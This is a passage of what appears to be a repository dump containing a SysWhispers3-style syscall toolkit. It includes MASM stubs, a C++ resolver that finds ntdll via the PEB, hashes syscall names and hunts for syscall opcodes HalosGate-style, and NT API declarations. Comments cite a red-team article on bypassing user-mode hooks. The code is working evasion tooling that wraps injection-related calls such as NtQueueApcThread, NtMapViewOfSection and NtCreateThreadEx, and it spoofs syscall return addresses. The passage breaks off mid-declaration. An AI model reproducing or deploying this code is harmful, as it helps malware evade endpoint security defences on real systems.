[rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQueryInformationThread ENDP\r\n\r\nNtCreateSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 01E971E05h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 01E971E05h        
; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtCreateSection ENDP\r\n\r\nNtOpenSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0CE38D0D5h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0CE38D0D5h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtOpenSection ENDP\r\n\r\nNtMapViewOfSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 008972E47h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 008972E47h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15          
                      ; Jump to -> Invoke system call.\r\nNtMapViewOfSection ENDP\r\n\r\nNtUnmapViewOfSection PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 0164DF406h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 0164DF406h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtUnmapViewOfSection ENDP\r\n\r\nNtAdjustPrivilegesToken PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 043DD4B40h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 043DD4B40h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtAdjustPrivilegesToken ENDP\r\n\r\nNtDeviceIoControlFile PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03F3657B2h        ; 
Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 03F3657B2h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtDeviceIoControlFile ENDP\r\n\r\nNtQueueApcThread PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 03E860C37h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 03E860C37h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber              ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtQueueApcThread ENDP\r\n\r\nNtWaitForMultipleObjects PROC\r\n\tint 3\r\n\tmov [rsp +8], rcx          ; Save registers.\r\n\tmov [rsp+16], rdx\r\n\tmov [rsp+24], r8\r\n\tmov [rsp+32], r9\r\n\tsub rsp, 28h\r\n\tmov ecx, 051256B89h        ; Load function hash into ECX.\r\n\tcall SW3_GetSyscallAddress              ; Resolve function hash into syscall offset.\r\n\tmov r15, rax                           ; Save the address of the syscall\r\n\tmov ecx, 051256B89h        ; Re-Load function hash into ECX (optional).\r\n\tcall SW3_GetSyscallNumber 
             ; Resolve function hash into syscall number.\r\n\tadd rsp, 28h\r\n\tmov rcx, [rsp+8]                      ; Restore registers.\r\n\tmov rdx, [rsp+16]\r\n\tmov r8, [rsp+24]\r\n\tmov r9, [rsp+32]\r\n\tmov r10, rcx\r\n\tjmp r15                                ; Jump to -> Invoke system call.\r\nNtWaitForMultipleObjects ENDP\r\n\r\nend"
  },
  {
    "path": "demo5/syscall3/syscall3/1.cpp",
    "content": "#include \"1.h\"\r\n#include <stdio.h>\r\n\r\n#define DEBUG\r\n\r\n#define JUMPER\r\n\r\n#ifdef _M_IX86\r\n\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID) {\r\n    return (PVOID)__readfsdword(0xC0);\r\n}\r\n\r\n__declspec(naked) BOOL local_is_wow64(void)\r\n{\r\n    __asm {\r\n        mov eax, fs: [0xc0]\r\n        test eax, eax\r\n        jne wow64\r\n        mov eax, 0\r\n        ret\r\n        wow64 :\r\n        mov eax, 1\r\n            ret\r\n    }\r\n}\r\n\r\n\r\n#endif\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\nSW3_SYSCALL_LIST SW3_SyscallList;\r\n\r\n// SEARCH_AND_REPLACE\r\n#ifdef SEARCH_AND_REPLACE\r\n// THIS IS NOT DEFINED HERE; don't know if I'll add it in a future release\r\nEXTERN void SearchAndReplace(unsigned char[], unsigned char[]);\r\n#endif\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName)\r\n{\r\n    DWORD i = 0;\r\n    DWORD Hash = SW3_SEED;\r\n\r\n    while (FunctionName[i])\r\n    {\r\n        WORD PartialName = *(WORD*)((ULONG_PTR)FunctionName + i++);\r\n        Hash ^= PartialName + SW3_ROR8(Hash);\r\n    }\r\n\r\n    return Hash;\r\n}\r\n\r\n#ifndef JUMPER\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n    return NULL;\r\n}\r\n#else\r\nPVOID SC_Address(PVOID NtApiAddress)\r\n{\r\n    DWORD searchLimit = 512;\r\n    PVOID SyscallAddress;\r\n\r\n#ifdef _WIN64\r\n    // If the process is 64-bit on a 64-bit OS, we need to search for syscall\r\n    BYTE syscall_code[] = { 0x0f, 0x05, 0xc3 };\r\n    ULONG distance_to_syscall = 0x12;\r\n#else\r\n    // If the process is 32-bit on a 32-bit OS, we need to search for sysenter\r\n    BYTE syscall_code[] = { 0x0f, 0x34, 0xc3 };\r\n    ULONG distance_to_syscall = 0x0f;\r\n#endif\r\n\r\n#ifdef _M_IX86\r\n    // If the process is 32-bit on a 64-bit OS, we need to jump to WOW32Reserved\r\n    if 
(local_is_wow64())\r\n    {\r\n#ifdef DEBUG\r\n        printf(\"[+] Running 32-bit app on x64 (WOW64)\\n\");\r\n#endif\r\n        return NULL;\r\n    }\r\n#endif\r\n\r\n    // we don't really care if there is a 'jmp' between\r\n    // NtApiAddress and the 'syscall; ret' instructions\r\n    SyscallAddress = SW3_RVA2VA(PVOID, NtApiAddress, distance_to_syscall);\r\n\r\n    if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n    {\r\n        // we can use the original code for this system call :)\r\n#if defined(DEBUG)\r\n        printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n        return SyscallAddress;\r\n    }\r\n\r\n    // the 'syscall; ret' intructions have not been found,\r\n    // we will try to use one near it, similarly to HalosGate\r\n\r\n    for (ULONG32 num_jumps = 1; num_jumps < searchLimit; num_jumps++)\r\n    {\r\n        // let's try with an Nt* API below our syscall\r\n        SyscallAddress = SW3_RVA2VA(\r\n            PVOID,\r\n            NtApiAddress,\r\n            distance_to_syscall + num_jumps * 0x20);\r\n        if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n        {\r\n#if defined(DEBUG)\r\n            printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n            return SyscallAddress;\r\n        }\r\n\r\n        // let's try with an Nt* API above our syscall\r\n        SyscallAddress = SW3_RVA2VA(\r\n            PVOID,\r\n            NtApiAddress,\r\n            distance_to_syscall - num_jumps * 0x20);\r\n        if (!memcmp((PVOID)syscall_code, SyscallAddress, sizeof(syscall_code)))\r\n        {\r\n#if defined(DEBUG)\r\n            printf(\"Found Syscall Opcodes at address 0x%p\\n\", SyscallAddress);\r\n#endif\r\n            return SyscallAddress;\r\n        }\r\n    }\r\n\r\n#ifdef DEBUG\r\n    printf(\"Syscall Opcodes not found!\\n\");\r\n#endif\r\n\r\n    return NULL;\r\n}\r\n#endif\r\n\r\n\r\nBOOL 
SW3_PopulateSyscallList()\r\n{\r\n    // Return early if the list is already populated.\r\n    if (SW3_SyscallList.Count) return TRUE;\r\n\r\n#ifdef _WIN64\r\n    PSW3_PEB Peb = (PSW3_PEB)__readgsqword(0x60);\r\n#else\r\n    PSW3_PEB Peb = (PSW3_PEB)__readfsdword(0x30);\r\n#endif\r\n    PSW3_PEB_LDR_DATA Ldr = Peb->Ldr;\r\n    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;\r\n    PVOID DllBase = NULL;\r\n\r\n    // Get the DllBase address of NTDLL.dll. NTDLL is not guaranteed to be the second\r\n    // in the list, so it's safer to loop through the full list and find it.\r\n    PSW3_LDR_DATA_TABLE_ENTRY LdrEntry;\r\n    for (LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)Ldr->Reserved2[1]; LdrEntry->DllBase != NULL; LdrEntry = (PSW3_LDR_DATA_TABLE_ENTRY)LdrEntry->Reserved1[0])\r\n    {\r\n        DllBase = LdrEntry->DllBase;\r\n        PIMAGE_DOS_HEADER DosHeader = (PIMAGE_DOS_HEADER)DllBase;\r\n        PIMAGE_NT_HEADERS NtHeaders = SW3_RVA2VA(PIMAGE_NT_HEADERS, DllBase, DosHeader->e_lfanew);\r\n        PIMAGE_DATA_DIRECTORY DataDirectory = (PIMAGE_DATA_DIRECTORY)NtHeaders->OptionalHeader.DataDirectory;\r\n        DWORD VirtualAddress = DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;\r\n        if (VirtualAddress == 0) continue;\r\n\r\n        ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)SW3_RVA2VA(ULONG_PTR, DllBase, VirtualAddress);\r\n\r\n        // If this is NTDLL.dll, exit loop.\r\n        PCHAR DllName = SW3_RVA2VA(PCHAR, DllBase, ExportDirectory->Name);\r\n\r\n        if ((*(ULONG*)DllName | 0x20202020) != 0x6c64746e) continue;\r\n        if ((*(ULONG*)(DllName + 4) | 0x20202020) == 0x6c642e6c) break;\r\n    }\r\n\r\n    if (!ExportDirectory) return FALSE;\r\n\r\n    DWORD NumberOfNames = ExportDirectory->NumberOfNames;\r\n    PDWORD Functions = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfFunctions);\r\n    PDWORD Names = SW3_RVA2VA(PDWORD, DllBase, ExportDirectory->AddressOfNames);\r\n    PWORD Ordinals = SW3_RVA2VA(PWORD, DllBase, 
ExportDirectory->AddressOfNameOrdinals);\r\n\r\n    // Populate SW3_SyscallList with unsorted Zw* entries.\r\n    DWORD i = 0;\r\n    PSW3_SYSCALL_ENTRY Entries = SW3_SyscallList.Entries;\r\n    do\r\n    {\r\n        PCHAR FunctionName = SW3_RVA2VA(PCHAR, DllBase, Names[NumberOfNames - 1]);\r\n\r\n        // Is this a system call?\r\n        if (*(USHORT*)FunctionName == 0x775a)\r\n        {\r\n            Entries[i].Hash = SW3_HashSyscall(FunctionName);\r\n            Entries[i].Address = Functions[Ordinals[NumberOfNames - 1]];\r\n            Entries[i].SyscallAddress = SC_Address(SW3_RVA2VA(PVOID, DllBase, Entries[i].Address));\r\n\r\n            i++;\r\n            if (i == SW3_MAX_ENTRIES) break;\r\n        }\r\n    } while (--NumberOfNames);\r\n\r\n    // Save total number of system calls found.\r\n    SW3_SyscallList.Count = i;\r\n\r\n    // Sort the list by address in ascending order.\r\n    for (DWORD i = 0; i < SW3_SyscallList.Count - 1; i++)\r\n    {\r\n        for (DWORD j = 0; j < SW3_SyscallList.Count - i - 1; j++)\r\n        {\r\n            if (Entries[j].Address > Entries[j + 1].Address)\r\n            {\r\n                // Swap entries.\r\n                SW3_SYSCALL_ENTRY TempEntry;\r\n\r\n                TempEntry.Hash = Entries[j].Hash;\r\n                TempEntry.Address = Entries[j].Address;\r\n                TempEntry.SyscallAddress = Entries[j].SyscallAddress;\r\n\r\n                Entries[j].Hash = Entries[j + 1].Hash;\r\n                Entries[j].Address = Entries[j + 1].Address;\r\n                Entries[j].SyscallAddress = Entries[j + 1].SyscallAddress;\r\n\r\n                Entries[j + 1].Hash = TempEntry.Hash;\r\n                Entries[j + 1].Address = TempEntry.Address;\r\n                Entries[j + 1].SyscallAddress = TempEntry.SyscallAddress;\r\n            }\r\n        }\r\n    }\r\n\r\n    return TRUE;\r\n}\r\n\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash)\r\n{\r\n    // Ensure SW3_SyscallList is 
populated.\r\n    if (!SW3_PopulateSyscallList()) return -1;\r\n\r\n    for (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n    {\r\n        if (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n        {\r\n            return i;\r\n        }\r\n    }\r\n\r\n    return -1;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash)\r\n{\r\n    // Ensure SW3_SyscallList is populated.\r\n    if (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n    for (DWORD i = 0; i < SW3_SyscallList.Count; i++)\r\n    {\r\n        if (FunctionHash == SW3_SyscallList.Entries[i].Hash)\r\n        {\r\n            return SW3_SyscallList.Entries[i].SyscallAddress;\r\n        }\r\n    }\r\n\r\n    return NULL;\r\n}\r\n\r\nEXTERN_C PVOID SW3_GetRandomSyscallAddress(DWORD FunctionHash)\r\n{\r\n    // Ensure SW3_SyscallList is populated.\r\n    if (!SW3_PopulateSyscallList()) return NULL;\r\n\r\n    DWORD index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n\r\n    while (FunctionHash == SW3_SyscallList.Entries[index].Hash) {\r\n        // Spoofing the syscall return address\r\n        index = ((DWORD)rand()) % SW3_SyscallList.Count;\r\n    }\r\n    return SW3_SyscallList.Entries[index].SyscallAddress;\r\n}\r\n"
  },
  {
    "path": "demo5/syscall3/syscall3/1.h",
    "content": "#pragma once\r\n\r\n// Code below is adapted from @modexpblog. Read linked article for more details.\r\n// https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams\r\n\r\n#ifndef SW3_HEADER_H_\r\n#define SW3_HEADER_H_\r\n\r\n#include <windows.h>\r\n\r\n#define SW3_SEED 0x5339C8CB\r\n#define SW3_ROL8(v) (v << 8 | v >> 24)\r\n#define SW3_ROR8(v) (v >> 8 | v << 24)\r\n#define SW3_ROX8(v) ((SW3_SEED % 2) ? SW3_ROL8(v) : SW3_ROR8(v))\r\n#define SW3_MAX_ENTRIES 500\r\n#define SW3_RVA2VA(Type, DllBase, Rva) (Type)((ULONG_PTR) DllBase + Rva)\r\n\r\n// Typedefs are prefixed to avoid pollution.\r\n\r\ntypedef struct _SW3_SYSCALL_ENTRY\r\n{\r\n\tDWORD Hash;\r\n\tDWORD Address;\r\n\tPVOID SyscallAddress;\r\n} SW3_SYSCALL_ENTRY, * PSW3_SYSCALL_ENTRY;\r\n\r\ntypedef struct _SW3_SYSCALL_LIST\r\n{\r\n\tDWORD Count;\r\n\tSW3_SYSCALL_ENTRY Entries[SW3_MAX_ENTRIES];\r\n} SW3_SYSCALL_LIST, * PSW3_SYSCALL_LIST;\r\n\r\ntypedef struct _SW3_PEB_LDR_DATA {\r\n\tBYTE Reserved1[8];\r\n\tPVOID Reserved2[3];\r\n\tLIST_ENTRY InMemoryOrderModuleList;\r\n} SW3_PEB_LDR_DATA, * PSW3_PEB_LDR_DATA;\r\n\r\ntypedef struct _SW3_LDR_DATA_TABLE_ENTRY {\r\n\tPVOID Reserved1[2];\r\n\tLIST_ENTRY InMemoryOrderLinks;\r\n\tPVOID Reserved2[2];\r\n\tPVOID DllBase;\r\n} SW3_LDR_DATA_TABLE_ENTRY, * PSW3_LDR_DATA_TABLE_ENTRY;\r\n\r\ntypedef struct _SW3_PEB {\r\n\tBYTE Reserved1[2];\r\n\tBYTE BeingDebugged;\r\n\tBYTE Reserved2[1];\r\n\tPVOID Reserved3[2];\r\n\tPSW3_PEB_LDR_DATA Ldr;\r\n} SW3_PEB, * PSW3_PEB;\r\n\r\nDWORD SW3_HashSyscall(PCSTR FunctionName);\r\nBOOL SW3_PopulateSyscallList();\r\nEXTERN_C DWORD SW3_GetSyscallNumber(DWORD FunctionHash);\r\nEXTERN_C PVOID SW3_GetSyscallAddress(DWORD FunctionHash);\r\nEXTERN_C PVOID internal_cleancall_wow64_gate(VOID);\r\ntypedef struct _SYSTEM_HANDLE\r\n{\r\n\tULONG ProcessId;\r\n\tBYTE ObjectTypeNumber;\r\n\tBYTE Flags;\r\n\tUSHORT Handle;\r\n\tPVOID Object;\r\n\tACCESS_MASK GrantedAccess;\r\n} 
SYSTEM_HANDLE, * PSYSTEM_HANDLE;\r\n\r\ntypedef struct _IO_STATUS_BLOCK\r\n{\r\n\tunion\r\n\t{\r\n\t\tNTSTATUS Status;\r\n\t\tVOID* Pointer;\r\n\t};\r\n\tULONG_PTR Information;\r\n} IO_STATUS_BLOCK, * PIO_STATUS_BLOCK;\r\n\r\ntypedef struct _SYSTEM_HANDLE_INFORMATION\r\n{\r\n\tULONG HandleCount;\r\n\tSYSTEM_HANDLE Handles[1];\r\n} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;\r\n\r\ntypedef VOID(KNORMAL_ROUTINE) (\r\n\tIN PVOID NormalContext,\r\n\tIN PVOID SystemArgument1,\r\n\tIN PVOID SystemArgument2);\r\n\r\ntypedef struct _PS_ATTRIBUTE\r\n{\r\n\tULONG  Attribute;\r\n\tSIZE_T Size;\r\n\tunion\r\n\t{\r\n\t\tULONG Value;\r\n\t\tPVOID ValuePtr;\r\n\t} u1;\r\n\tPSIZE_T ReturnLength;\r\n} PS_ATTRIBUTE, * PPS_ATTRIBUTE;\r\n\r\ntypedef struct _UNICODE_STRING\r\n{\r\n\tUSHORT Length;\r\n\tUSHORT MaximumLength;\r\n\tPWSTR  Buffer;\r\n} UNICODE_STRING, * PUNICODE_STRING;\r\n\r\n#ifndef InitializeObjectAttributes\r\n#define InitializeObjectAttributes( p, n, a, r, s ) { \\\r\n\t(p)->Length = sizeof( OBJECT_ATTRIBUTES );        \\\r\n\t(p)->RootDirectory = r;                           \\\r\n\t(p)->Attributes = a;                              \\\r\n\t(p)->ObjectName = n;                              \\\r\n\t(p)->SecurityDescriptor = s;                      \\\r\n\t(p)->SecurityQualityOfService = NULL;             \\\r\n}\r\n#endif\r\n\r\ntypedef struct _OBJECT_ATTRIBUTES\r\n{\r\n\tULONG           Length;\r\n\tHANDLE          RootDirectory;\r\n\tPUNICODE_STRING ObjectName;\r\n\tULONG           Attributes;\r\n\tPVOID           SecurityDescriptor;\r\n\tPVOID           SecurityQualityOfService;\r\n} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;\r\n\r\ntypedef struct _CLIENT_ID\r\n{\r\n\tHANDLE UniqueProcess;\r\n\tHANDLE UniqueThread;\r\n} CLIENT_ID, * PCLIENT_ID;\r\n\r\ntypedef enum _SYSTEM_INFORMATION_CLASS\r\n{\r\n\tSystemBasicInformation = 0,\r\n\tSystemPerformanceInformation = 2,\r\n\tSystemTimeOfDayInformation = 3,\r\n\tSystemProcessInformation = 
5,\r\n\tSystemProcessorPerformanceInformation = 8,\r\n\tSystemHandleInformation = 16,\r\n\tSystemInterruptInformation = 23,\r\n\tSystemExceptionInformation = 33,\r\n\tSystemRegistryQuotaInformation = 37,\r\n\tSystemLookasideInformation = 45,\r\n\tSystemCodeIntegrityInformation = 103,\r\n\tSystemPolicyInformation = 134,\r\n} SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS;\r\n\r\ntypedef enum _PROCESSINFOCLASS\r\n{\r\n\tProcessBasicInformation = 0,\r\n\tProcessDebugPort = 7,\r\n\tProcessWow64Information = 26,\r\n\tProcessImageFileName = 27,\r\n\tProcessBreakOnTermination = 29\r\n} PROCESSINFOCLASS, * PPROCESSINFOCLASS;\r\n\r\ntypedef enum _WAIT_TYPE\r\n{\r\n\tWaitAll = 0,\r\n\tWaitAny = 1\r\n} WAIT_TYPE, * PWAIT_TYPE;\r\n\r\ntypedef VOID(NTAPI* PIO_APC_ROUTINE) (\r\n\tIN PVOID            ApcContext,\r\n\tIN PIO_STATUS_BLOCK IoStatusBlock,\r\n\tIN ULONG            Reserved);\r\n\r\ntypedef KNORMAL_ROUTINE* PKNORMAL_ROUTINE;\r\n\r\ntypedef enum _THREADINFOCLASS\r\n{\r\n\tThreadBasicInformation,\r\n\tThreadTimes,\r\n\tThreadPriority,\r\n\tThreadBasePriority,\r\n\tThreadAffinityMask,\r\n\tThreadImpersonationToken,\r\n\tThreadDescriptorTableEntry,\r\n\tThreadEnableAlignmentFaultFixup,\r\n\tThreadEventPair_Reusable,\r\n\tThreadQuerySetWin32StartAddress,\r\n\tThreadZeroTlsCell,\r\n\tThreadPerformanceCount,\r\n\tThreadAmILastThread,\r\n\tThreadIdealProcessor,\r\n\tThreadPriorityBoost,\r\n\tThreadSetTlsArrayAddress,\r\n\tThreadIsIoPending,\r\n\tThreadHideFromDebugger,\r\n\tThreadBreakOnTermination,\r\n\tMaxThreadInfoClass\r\n} THREADINFOCLASS, * PTHREADINFOCLASS;\r\n\r\ntypedef enum _SECTION_INHERIT\r\n{\r\n\tViewShare = 1,\r\n\tViewUnmap = 2\r\n} SECTION_INHERIT, * PSECTION_INHERIT;\r\n\r\ntypedef enum _FILE_INFORMATION_CLASS\r\n{\r\n\tFileDirectoryInformation = 1,\r\n\tFileFullDirectoryInformation = 2,\r\n\tFileBothDirectoryInformation = 3,\r\n\tFileBasicInformation = 4,\r\n\tFileStandardInformation = 5,\r\n\tFileInternalInformation = 6,\r\n\tFileEaInformation = 
7,\r\n\tFileAccessInformation = 8,\r\n\tFileNameInformation = 9,\r\n\tFileRenameInformation = 10,\r\n\tFileLinkInformation = 11,\r\n\tFileNamesInformation = 12,\r\n\tFileDispositionInformation = 13,\r\n\tFilePositionInformation = 14,\r\n\tFileFullEaInformation = 15,\r\n\tFileModeInformation = 16,\r\n\tFileAlignmentInformation = 17,\r\n\tFileAllInformation = 18,\r\n\tFileAllocationInformation = 19,\r\n\tFileEndOfFileInformation = 20,\r\n\tFileAlternateNameInformation = 21,\r\n\tFileStreamInformation = 22,\r\n\tFilePipeInformation = 23,\r\n\tFilePipeLocalInformation = 24,\r\n\tFilePipeRemoteInformation = 25,\r\n\tFileMailslotQueryInformation = 26,\r\n\tFileMailslotSetInformation = 27,\r\n\tFileCompressionInformation = 28,\r\n\tFileObjectIdInformation = 29,\r\n\tFileCompletionInformation = 30,\r\n\tFileMoveClusterInformation = 31,\r\n\tFileQuotaInformation = 32,\r\n\tFileReparsePointInformation = 33,\r\n\tFileNetworkOpenInformation = 34,\r\n\tFileAttributeTagInformation = 35,\r\n\tFileTrackingInformation = 36,\r\n\tFileIdBothDirectoryInformation = 37,\r\n\tFileIdFullDirectoryInformation = 38,\r\n\tFileValidDataLengthInformation = 39,\r\n\tFileShortNameInformation = 40,\r\n\tFileIoCompletionNotificationInformation = 41,\r\n\tFileIoStatusBlockRangeInformation = 42,\r\n\tFileIoPriorityHintInformation = 43,\r\n\tFileSfioReserveInformation = 44,\r\n\tFileSfioVolumeInformation = 45,\r\n\tFileHardLinkInformation = 46,\r\n\tFileProcessIdsUsingFileInformation = 47,\r\n\tFileNormalizedNameInformation = 48,\r\n\tFileNetworkPhysicalNameInformation = 49,\r\n\tFileIdGlobalTxDirectoryInformation = 50,\r\n\tFileIsRemoteDeviceInformation = 51,\r\n\tFileUnusedInformation = 52,\r\n\tFileNumaNodeInformation = 53,\r\n\tFileStandardLinkInformation = 54,\r\n\tFileRemoteProtocolInformation = 55,\r\n\tFileRenameInformationBypassAccessCheck = 56,\r\n\tFileLinkInformationBypassAccessCheck = 57,\r\n\tFileVolumeNameInformation = 58,\r\n\tFileIdInformation = 59,\r\n\tFileIdExtdDirectoryInformation 
= 60,\r\n\tFileReplaceCompletionInformation = 61,\r\n\tFileHardLinkFullIdInformation = 62,\r\n\tFileIdExtdBothDirectoryInformation = 63,\r\n\tFileDispositionInformationEx = 64,\r\n\tFileRenameInformationEx = 65,\r\n\tFileRenameInformationExBypassAccessCheck = 66,\r\n\tFileMaximumInformation = 67,\r\n} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;\r\n\r\ntypedef struct _PS_ATTRIBUTE_LIST\r\n{\r\n\tSIZE_T       TotalLength;\r\n\tPS_ATTRIBUTE Attributes[1];\r\n} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;\r\n\r\nEXTERN_C NTSTATUS NtCreateProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ParentProcess,\r\n\tIN BOOLEAN InheritObjectTable,\r\n\tIN HANDLE SectionHandle OPTIONAL,\r\n\tIN HANDLE DebugPort OPTIONAL,\r\n\tIN HANDLE ExceptionPort OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtCreateThreadEx(\r\n\tOUT PHANDLE ThreadHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,\r\n\tIN HANDLE ProcessHandle,\r\n\tIN PVOID StartRoutine,\r\n\tIN PVOID Argument OPTIONAL,\r\n\tIN ULONG CreateFlags,\r\n\tIN SIZE_T ZeroBits,\r\n\tIN SIZE_T StackSize,\r\n\tIN SIZE_T MaximumStackSize,\r\n\tIN PPS_ATTRIBUTE_LIST AttributeList OPTIONAL);\r\n\r\nEXTERN_C NTSTATUS NtOpenProcess(\r\n\tOUT PHANDLE ProcessHandle,\r\n\tIN ACCESS_MASK DesiredAccess,\r\n\tIN POBJECT_ATTRIBUTES ObjectAttributes,\r\n\tIN 